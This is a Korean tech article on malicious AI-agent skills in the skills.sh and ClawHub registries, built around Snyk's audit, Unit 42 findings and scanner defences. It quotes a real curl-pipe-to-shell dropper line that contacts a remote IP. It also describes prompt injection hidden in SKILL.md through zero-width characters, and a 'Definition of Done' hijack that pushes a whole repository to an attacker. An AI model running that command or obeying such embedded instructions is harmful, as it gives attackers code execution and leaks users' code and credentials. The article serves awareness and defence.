skills.sh 악성 스킬 76개 삭제 — 8개는 여전히 활성

Snyk ToxicSkills 감사에서 에이전트 스킬 3,984개 중 36.8% 결함, 리버스 셸 포함 악성 76개 확인.

skills.sh 악성 스킬 76개 삭제 — 8개는 여전히 활성
Share

에이전트 스킬은 겉으로는 문서처럼 읽히지만 실제로는 악성코드처럼 작동할 수 있다. 2026년 2월 진행된 한 대규모 조사에서는 그 간극이 얼마나 자주 위험으로 바뀌는지 수치로 드러났다. Snyk Labs는 공개된 스킬 약 4,000개를 스캔해, 실제 자격 증명 탈취와 리버스 셸 페이로드를 담은 사례 수십 건을 발견했다. 대부분은 코드가 아니라 평범한 영어 문장으로 에이전트를 조종하고 있었다.

Snyk의 ToxicSkills 조사에서 3,984개 제출물이 드러낸 것

2026년 2월 5일 공개된 Snyk Labs의 ToxicSkills 연구는 에이전트 스킬 범주를 대규모로 정량 감사한 첫 사례이며, 그 수치는 꽤 심각하다. ClawHub와 skills.sh 전반의 스킬 3,984개를 스캔한 결과, 36.82%(1,467개)에서 하나 이상의 보안 결함이 발견됐고 13.4%(534개)는 치명적 이슈를 포함하고 있었다 . 이 중 76개에는 자격 증명 탈취, 리버스 셸, 데이터 유출 같은 확인된 악성 페이로드가 들어 있었으며, 그 가운데 8개는 보고서 발행 시점에도 ClawHub에서 공개 접근이 가능한 상태였다 .

빠른 답변: Snyk Labs의 ToxicSkills 감사(2026년 2월 5일)는 에이전트 스킬 3,984개를 스캔해 자격 증명 탈취, 리버스 셸, 데이터 유출을 포함한 악성 페이로드 76개를 확인했다. 발행 시점에도 8개는 ClawHub에 살아 있었고, 악성으로 확인된 세트의 91%는 실행 코드가 아니라 자연어 지시문을 통해 공격했다.

가장 중요한 발견은 개수가 아니라 공격 경로다. 악성으로 확인된 세트의 91%는 실행 코드를 주된 공격 경로로 쓰지 않고, LLM이 읽고 행동으로 옮기는 자연어 지시문 계층을 이용했다 . 이는 지난 10년간의 소프트웨어 리뷰 감각을 뒤집는다. 정적 스캐너는 위험한 코드를 찾도록 조정돼 있지만, 여기서 위험은 무해한 안내문처럼 보이면서 에이전트의 추론을 다른 방향으로 돌리는 지시문 안에 있다. 이것이 이 범주의 구조적 위험을 규정하는 핵심이며, 전통적인 패키지 감사 기대치를 스킬에 그대로 적용하기 어려운 이유다.

Snyk는 근본 원인을 게시 장벽, 정확히는 장벽의 부재로 짚었다. 기본 경로에서 스킬은 SKILL.md 파일 하나와 생성된 지 일주일 정도 된 GitHub 계정만 있으면 충분하며, 서명, 필수 리뷰, 샌드박스가 없다.

"서명, 리뷰, 샌드박스 관문이 전혀 없고 누구나 게시할 수 있는 제출 표면이 결합되면서, 악성으로 확인된 스킬이 카탈로그에 올라가고 계속 남아 있을 수 있었다," — Snyk Labs, ToxicSkills 보고서 (source: Snyk Labs, 2026-02).

규모는 위험을 더 키우는 요인이다. 일일 제출량은 3주 사이 약 10배 늘어, 2026년 1월 중순 하루 50개 미만에서 2월 초에는 하루 500개를 넘었다 . 이 속도는 원클릭 설치에 가깝게 마찰을 줄이도록 설계된 발견 표면(skills.sh) 위에서, 어떤 수동 리뷰 역량도 한 자릿수 이상으로 앞질러 버린다. 이어지는 섹션에서는 마크다운 파일 하나가 어떻게 무기가 되는지, 실제 문서화된 사고가 현장에서 어떤 모습인지, 그리고 다음 76개를 막을 서명 표준이 왜 아직 존재하지 않는지를 따라간다.

마크다운 문서 하나, 서명 없음: 76개가 통과한 장벽

What Snyk's ToxicSkills Sweep Turned Up in 3,984 Submissions

스킬을 게시하는 데 필요한 장벽은 마크다운 파일 하나와 대략 일주일 된 GitHub 계정뿐이다. 코드 서명도, 암호학적 출처 증명도, 제출물이 카탈로그에 나타나기 전 반드시 거치는 사람의 리뷰도 없다. Snyk는 ToxicSkills 감사에서 확인한 악성 스킬 76개의 근본 원인으로 이 낮은 장벽을 지목하며, 게시에는 SKILL.md 파일과 일주일 된 계정만 필요하고 그 경로에는 서명, 리뷰, 샌드박스가 없다고 설명했다 .

설치는 의도적으로 마찰이 거의 없게 만들어져 있다. 단일 명령어인 npx skills add <owner/repo>는 어떤 GitHub 저장소에서든 스킬을 바로 가져와 .claude/skills/, ~/.claude/skills/, ~/.codex/skills/, ~/.cursor/skills/ 같은 에이전트의 스킬 디렉터리에 프로젝트 범위 또는 전역 범위로 기록한다 . 처음 실행되는 순간 스킬은 호스트 에이전트의 전체 권한, 즉 파일시스템, 터미널 실행, 네트워크, 자격 증명 접근 권한을 물려받으며, 내려받은 폴더와 그 폴더가 도착한 기계 사이에는 기본 샌드박스가 없다 .

규모 때문에 수동 검증은 구조적으로 불가능하다. skills.sh는 이제 커뮤니티가 기여한 항목 60,000개 이상을 색인하고 있으며 , 여기에 ClawHub, OpenClaw 레지스트리, agentskill.sh/ags 같은 병렬 레지스트리를 더하면 전체 풀은 100,000개를 넘어선다 . 특히 3주 사이 약 10배 늘어난 제출 속도를 상대해야 하는 상황에서는, 어떤 사람 리뷰 팀도 이 물량을 감당할 수 없다.

Node 18 이상을 요구하는 vercel-labs/skills CLI 버전 1.5.15는 경고를 보여주기는 한다. 각 설치가 끝날 때 콘텐츠가 전체 에이전트 권한으로 실행된다는 안내를 표시한다 . 하지만 이 경고는 정보 제공일 뿐, 강제력이 아니다. 설치를 막지도, 코드를 격리하지도, 게시자가 누구인지 검증하지도 않는다. 주의 문구는 있지만 악성 스킬을 실제로 멈출 마찰은 없는 것이다. 바로 이 간극이 다음 여러 섹션에서 해부할 공격 표면이다.

무기가 되는 SKILL.md: 마크다운 조종, 실행 파일 번들링, 제로폭 은닉

스킬은 하나의 폴더가 동시에 세 가지 역할을 한다는 점을 무기화한다. 레지스트리를 훑어보는 사람이 읽는 문서, LLM이 토큰 단위로 파싱하는 모델 지시문, 그리고 scripts/ 디렉터리에서 Bash, Python, Deno, Bun, Ruby로 실행되는 도구다. 전통적인 소프트웨어 리뷰는 한 층, 즉 코드만 검사하고 그 주변의 산문은 비활성 텍스트로 취급한다. 여기서는 산문 자체가 공격 표면이다. 무해해 보이는 description은 검색과 활성화를 조종할 수 있고, 무해해 보이는 스크립트도 에이전트 지시문 및 로컬 자격 증명과 결합될 때만 적대적으로 변한다. 세 층을 모두 깔끔하게 포괄하는 단일 리뷰 관점은 없다.

피해 범위는 번들링에서 넓어진다. 스킬은 uvx, pipx, npx, bunx, deno run, go run을 통해 일회성 바이너리를 호출해, 리뷰어가 나중에 알아차릴 만한 영구 설치 흔적 없이 원격 코드를 가져와 실행할 수 있다 . 호스트 에이전트가 전체 파일시스템 및 네트워크 접근 권한으로 이를 실행하기 전에 이런 호출을 막는 명시적 게이트는 없다. 측정된 효과도 구체적이다. 2026년 1월 31,132개 스킬을 분석한 결과, 실행 스크립트를 번들한 패키지는 지시문만 있는 스킬보다 취약점을 포함할 가능성이 2.12배 높았다 .

은닉은 이 고리를 완성한다. 적대적 지시문은 제로폭 유니코드 문자, HTML 주석, 유니코드 스테가노그래피 뒤에 숨어 있다. 사람이 검토하는 렌더링된 레지스트리 페이지에서는 보이지 않지만, 원시 바이트 시퀀스를 읽는 LLM에는 그대로 토큰화된다 . 리뷰어와 모델은 사실상 같은 파일에서 서로 다른 문서를 읽고 있는 셈이다.

"[Skills are] where mobile apps and browser extensions stood a decade ago — extensibility outpacing audit primitives,"라고 Palo Alto Networks의 Unit 42는 에이전트형 공급망 분석에서 썼다 (source: Unit 42).

명세에는 제동 장치가 있긴 하지만 약하다. 실험적 allowed-tools 필드는 스킬이 호출할 수 있는 대상을 제한할 수 있지만, 생태계가 겨냥하는 약 68개 이상의 에이전트 구현 전반에서 지원 수준이 크게 다르고 , 레지스트리 계층에서 강제되지도 않는다. 이는 퍼블리셔가 그냥 생략할 수 있는 옵트인 인프라에 머문다. 결국 도구 호출 남용을 막는 유일한 네이티브 통제 장치는 기본적으로 빠져 있으며, 특히 가장 면밀히 조사해야 할 스킬에서 그렇다 .

확인된 사건들: Curl-Pipe 백도어, 코드베이스 유출, 봇으로 부풀린 추천 수

Screenshot of https://github.com/vercel-labs/skills

이론적 공격 표면은 이미 실행 코드, 에이전트 지시문, 사회적 증거라는 세 개의 서로 다른 층에서 이름 붙은 문서화된 사건으로 이어졌다. Socket 연구진은 레지스트리 목록만 보면 완전히 무해해 보이는 Polymarket 데이터 스킬을 분석했고, 참조된 Python 스크립트 안쪽 여러 계층 깊숙한 곳에 os.system("curl -s http://54.91.154.110:13338/ | sh")가 묻혀 있음을 발견했다. 렌더링된 목록 페이지에는 전혀 표시되지 않는 의존성 브랜치 안에 드로퍼가 들어 있었던 것이다 . 카탈로그 페이지에서 리뷰어가 읽는 것과 설치 시 실제로 실행되는 것 사이의 간극은 모든 확인 사례에서 반복되는 주제다.

Mitiga Labs는 지시문 계층의 변형을 시연했다. 이들은 합법적으로 보이는 테스트 스킬의 "Definition of Done" 블록에 악성 단계를 넣어 무기화했고, 그 결과 에이전트는 확인 프롬프트도, 에이전트 자체가 생성한 감사 로그 항목도 없이 전체 로컬 저장소를 공격자가 통제하는 공개 브랜치로 조용히 푸시했다 . 이는 고전적 의미의 코드 익스플로잇이 아니다. 스킬이 신뢰받는 에이전트에게 개발자가 승인한 적 없는 일을 하라고 말했고, 에이전트가 그대로 따른 것이다.

공격자는 자동화된 봇 추천과 가짜 다운로드 수로 신뢰를 부풀려, 사람이 검토해 잡아내기 전에 악성 항목을 인기 순위표에 올린다. 사회적 증거 계층은 코드 계층만큼이나 악용 가능하다. — Mitiga Labs (source: Mitiga Labs)

탐지기는 왜 계속 놓치는가? 2026년 6월, 라벨링된 악성 샘플 3,944개로 구성된 벤치마크 MalSkillBench는 문제가 구조적이라고 결론 내렸다. 프롬프트 인젝션 방어와 공급망 정적 스캐너가 각각 코드와 지시문이 결합된 하이브리드 산출물의 절반만 검사하기 때문이다 . 셸 페이로드에 맞춰진 스캐너는 "Definition of Done" 하이재킹을 놓치고, 인젝션 필터는 하위 의존성에 숨은 curl-pipe 드로퍼를 놓친다. 어느 도구도 전체 위협을 보지 못한다. 바로 그 점 때문에 카탈로그에 감사 도구가 이미 적용되고 있었음에도 악성 스킬 76개가 게시될 수 있었다.

Unit 42 BIV가 OpenClaw 등록 49,943건에서 확인한 결과: 80%는 불일치, 18.9%는 의도적

Behavioral Integrity Verification(BIV)는 Palo Alto Networks Unit 42가 스킬이 주장한 대로 작동하는지 확인하는 방법이다. 메타데이터, 코드, 자연어 지침에 드러난 선언된 의도를 해당 아티팩트가 실제로 행사하는 기능과 비교한다. BIV를 OpenClaw 레지스트리 등록 49,943건에 적용하자, 7개 행동군에 걸친 29개 기능 분류 체계 기준으로 80.0%에서 선언과 실제 행동의 불일치가 표시됐다. 이 숫자는 비상 상황처럼 보이지만, 스킬 5개 중 4개가 적대적이라는 뜻은 아니다.

중요한 것은 그 아래의 분류다. Unit 42가 분류할 수 있었던 이탈 사례 중 81.1%는 개발자 부주의에서 비롯됐다. 오래된 문서, 허술한 메타데이터, 설명보다 조용히 커져버린 스크립트 같은 경우다. 반면 적대적 사례는 18.9%에 그쳤다. 80%라는 헤드라인은 의도보다 부실함을 훨씬 더 많이 측정한 값이며, 모든 불일치를 공격으로 취급하면 진짜 신호는 문서 부채 속에 묻힌다.

위험한 부분은 더 작고 구체적이다. 상위 5.0% — 2,490 skills에는 다단계 공격 체인이 포함되어 있으며, 그 안에서는 조용한 자격 증명 유출과 지침 오버라이드 탈취가 행동의 88%를 차지한다. Unit 42는 이 생태계를 10년 전 모바일 앱과 브라우저 확장 프로그램이 있던 위치에 가깝다고 본다. 확장성은 빠르게 앞서가고, 이를 감시해야 할 감사 기본 도구는 뒤처진 상태다.

구간비중해석
선언/행동 불일치가 1개 이상 있는 스킬80.0%대부분은 악의가 아니라 노이즈
분류된 이탈 — 개발자 부주의81.1%오래된 문서, 느슨한 메타데이터
분류된 이탈 — 적대적18.9%의도적 불일치
최상위 위험 구간(2,490개 스킬)5.0%다단계 공격 체인
그 구간 중 — 자격 증명 유출 + 지침 탈취88%실제 피해가 집중되는 지점

2026년 1월에 나온 별도의 마켓플레이스 연구도 위험이 어디에 집중되는지 보여준다. 이 연구는 스킬 42,447개를 수집하고 31,132개를 분석했으며, 그중 26.1%가 최소 하나의 취약점을 갖고 있음을 확인했다. 더 날카로운 발견은 구조적이었다. 실행 가능한 스크립트를 함께 포함한 스킬은 지침만 있는 스킬보다 취약점을 포함할 가능성이 2.12x 높았다. 가장 강한 단일 위험 예측 변수는 설명문이 아니라 스크립팅 계층이다. 이는 이미 문서화된 curl-pipe 드로퍼와 유출 체인과도 맞아떨어지며, 검토자가 가장 먼저 봐야 할 곳을 분명히 알려준다. scripts/ 디렉터리를 싣고 오는 스킬은 설치 허용보다 먼저 정밀 검토 대상이 된다.

악성 행위자를 잡아내기 위해 이미 있는 것들: Socket, SkillSpector, OWASP Agentic Top 10

SKILL.md as Weapon: Markdown Steering, Executable Bundling, Zero-Width Concealment (source: unit42.paloaltonetworks.com)

방어 계층은 등장하고 있지만, 이는 차단 장치가 아니라 스캐닝에 가깝다. 가장 중요한 움직임은 Socket의 설치 시점 분석이다. Feb 17, 2026 기준으로 Vercel은 설치된 스킬 소스를 Socket에 업로드해 정적 스캔을 수행하며, 악성 382개/정상 355개로 구성된 보류 평가 세트에서 94.5% precision, 98.7% recall, and F1 96.7% on a 382-malicious / 355-benign held-out set을 보고했다. 강력한 분류기인 것은 맞지만, 이미 설치를 선택한 뒤에 실행된다. 잠긴 문이 아니라 경고 라벨에 가깝다.

나머지 생태계도 같은 경계선을 따라 갈린다. NVIDIA의 SkillSpector는 오픈소스 정적 전용 스캐너로, 정규식, Python AST 파싱, YARA 규칙에 선택적 LLM 패스를 결합하며 스킬을 실행하지는 않는다. 코드만 보는 도구가 아니라 마크다운과 코드가 섞인 하이브리드 아티팩트에 맞춰 의도적으로 설계된 방식이다. JFrog는 반대쪽 자세를 취한다. 공개 커뮤니티 제출을 받지 않는 선별형 Skills Registry를 운영해 표면을 줄이고, 커버리지를 신뢰와 맞바꾸는 무관용 검증을 택한다. OWASP는 Agentic Skills Top 10을 작성 중이며, 그중 AST01(Malicious Skills)은 감사자에게 공통 어휘를 제공하지만 집행력은 없다.

방어 수단접근 방식게이트인가, 권고인가?
Socket (skills.sh)설치 시점 정적 스캔, F1 96.7%권고 — 차단이 아니라 라벨
NVIDIA SkillSpector정규식 + AST + YARA + 선택적 LLM, 실행은 하지 않음권고(직접 실행)
JFrog Skills Registry수동 검증, 공개 제출 없음게이트 — 배제로 통제
OWASP AST01악성 스킬을 위한 공통 분류 체계둘 다 아님 — 가이드

그 간극은 레지스트리 자체의 감사 페이지에서도 드러난다. 이 페이지는 Gen Agent Trust Hub, Socket, Snyk 판정을 모아 보여주지만 여전히 Pending으로 표시된 항목을 나열한다. 최소 한 개의 리더보드 스킬은 Trust Hub Fail 판정을 받은 상태에서도 작동하는 설치 명령을 보여줬다. Unit 42는 지금을 10년 전 모바일 앱과 브라우저 확장 프로그램이 있던 시기와 비슷하다고 설명한다. 확장성은 감사 기본 도구보다 앞서가고 있다 (source: Palo Alto Networks Unit 42). 감사 결과는 노출되지만, 그중 어느 것도 버튼을 막지는 않는다.

에이전트형 레지스트리에는 서명 표준이 없다

2026년 7월 현재, 에이전트형 스킬 레지스트리에 적용되는 업계 표준 코드 서명 체계나 의무적인 발행 전 심사 관문은 없다 . 각 레지스트리가 저마다 기준을 정하며, 감사에 실패했다고 설치 명령을 차단하는 곳은 없다. Unit 42의 표현을 빌리면, 이 범주는 대략 10년 전 모바일 앱스토어와 브라우저 확장 마켓플레이스가 있던 지점에 놓여 있다. 확장성은 감사 기본 장치보다 더 빠르게 앞서 나가고 있다 .

프로세스 격리도 이 공백을 메우지 못한다. CVE-2026-39861로 추적된 Claude Code의 심링크 이탈 결함은, 에이전트형 터미널 환경에서 샌드박스 이탈이 여전히 실제 우려임을 보여줬다 . 샌드박싱은 다층 방어이지, 단단한 경계가 아니다. 그리고 skills.sh가 대상으로 삼는 에이전트 전반에 기본으로 배포되어 있지도 않다.

두 가지 구조적 발견은 위험을 더 키운다. 2026년 7월 연구는 skills.sh 항목 18,463개와 GitHub 저장소 5,876곳의 개인 스킬 23,199개를 조사해 재사용 연결 3,709건을 확인했으며, 재사용된 스킬의 53%가 도입 이후 한 번도 수정되지 않았다는 점을 발견했다 . 복사된 결함은 재평가 없이 하위로 전파된다. 또한 2026년 5월 의미론적 공급망 공격 논문은 실행 코드 없이 SKILL.md만 조작해 적대적 쌍대 비교 승률 86%에 도달하고, 사례의 36.5%에서 100%까지 차단 판정을 회피할 수 있음을 보였다 . 정적 코드 스캐너는 구조적으로 이 공격군 전체를 놓친다.

실무적인 결론은 이렇다. 모든 스킬을 서명되지 않고, 심사되지 않은, 전체 에이전트 권한을 가진 서드파티 코드로 취급해야 한다. 실제로 그렇기 때문이다. 버전을 고정하고, 설치 전에 원본 SKILL.md와 스크립트를 읽고, 스크립트를 함께 묶은 스킬보다 지침만 있는 스킬을 우선하며, 상시 자격 증명 없이 에이전트를 실행하라. 서명 관문이 생기기 전까지 검토 책임은 사용자에게 있다.

자주 묻는 질문

skills.sh 스킬은 무엇이며, 브라우저 확장 프로그램이나 플러그인과 무엇이 다른가?

스킬은 SKILL.md 마크다운 파일이 들어 있는 폴더다. 이 파일은 사람을 위한 문서, LLM 지침, 선택적 실행 도구 역할을 동시에 하며, 여기에 scripts/, references/, assets/ 디렉터리가 함께 놓인다 . 브라우저 확장 프로그램은 샌드박스 런타임에서 실행되고 OS 수준 권한 프롬프트와 앱스토어 심사 관문을 거친다. 스킬에는 이런 장치가 없다. 설치는 npx skills add <owner/repo>라는 단일 명령이며, 이후 스킬은 호스트 에이전트의 전체 프로세스 권한, 즉 파일시스템, 터미널, 네트워크, 자격 증명 접근 권한으로 실행된다 . 기본 샌드박스도, 코드 서명도, 의무 심사도 없다.

Snyk 감사 이후에도 확인된 악성 스킬 8개가 계속 공개되어 있었던 이유는 무엇인가?

이들 레지스트리에서 감사 결과는 권고일 뿐, 차단 관문이 아니기 때문이다. 2026년 2월 5일 공개된 Snyk Labs의 ToxicSkills 연구는 확인된 악성 페이로드가 있는 스킬 76개를 발견했으며, 그중 8개는 발표 시점에도 ClawHub에서 공개적으로 접근 가능했다 . skills.sh는 감사 페이지에서 서드파티 스캔 결과를 모아 보여주지만, 등록된 모든 스킬의 보안을 보장할 수는 없다고 명시한다. 또한 Fail 판정이나 Pending 상태가 있어도 항목은 계속 검색되고 설치될 수 있다 . 삭제는 각 공개 내용을 보고 개별 레지스트리 운영자가 조치하느냐에 달려 있다.

레지스트리 목록 페이지만 읽어도 악성 스킬을 알아볼 수 있나?

대개는 어렵다. 제로폭 유니코드 문자와 HTML 주석은 렌더링된 목록에서는 보이지 않지만 LLM은 이를 파싱한다 . Socket이 문서화한 Polymarket 드로퍼는 겉으로는 정상처럼 보였다. 페이로드인 os.system("curl -s http://.../ | sh")가 페이지에 표시된 최상위 SKILL.md가 아니라, 참조된 Python 스크립트 안쪽 여러 계층 아래에 묻혀 있었기 때문이다 . 사회적 신호도 신뢰하기 어렵다. Mitiga Labs는 공격자가 봇 추천과 가짜 다운로드로 신뢰를 부풀린다고 경고했으므로, 별점과 설치 수는 진단 지표라기보다 악용 가능한 신호에 가깝다 .

skills.sh의 Socket 연동이 설치를 안전하게 만들어 주나?

기준을 실질적으로 높이기는 하지만 안전을 보장하지는 않는다. Vercel은 이제 설치된 스킬 소스를 Socket에 업로드해 스캔하며, Socket은 악성 382개와 정상 355개로 라벨링된 세트에서 정밀도 94.5%, 재현율 98.7%를 보고했다 . 이 수치에도 놓치는 사례는 남는다. 더 근본적으로, 스캐너는 순수 의미론적 공격을 잡아낼 수 없다. 실행 코드 없이 SKILL.md만으로 프롬프트를 조작하는 방식은 2026년 5월 연구에서 사례의 36.5%–100%까지 차단 판정을 회피했다 . 정적 스캔은 다층 방어일 뿐, 안전 보장이 아니다.

어떤 AI 코딩 에이전트가 skills.sh 공급망 위험에 노출되나?

표준 스킬 디렉터리에서 스킬을 불러오는 모든 에이전트가 해당된다. 여기에는 Claude Code(~/.claude/skills/), Codex(~/.codex/skills/), Cursor(~/.cursor/skills/)가 포함되며, GitHub Copilot, Gemini CLI, Windsurf, Cline, AMP와 vercel-labs/skills CLI에 나열된 60개 이상의 다른 에이전트도 포함된다 . 저장소의 .claude/skills/에 놓인 프로젝트 범위 스킬도 해당 저장소를 클론하고 그 안에서 에이전트를 실행하는 모든 사람에게 영향을 준다. 노출은 개발자가 의도적으로 설치한 스킬에만 한정되지 않는다 .

이 글이 도움이 되셨다면, 새 글이 올라올 때마다 이메일로 받아보세요.

구독하기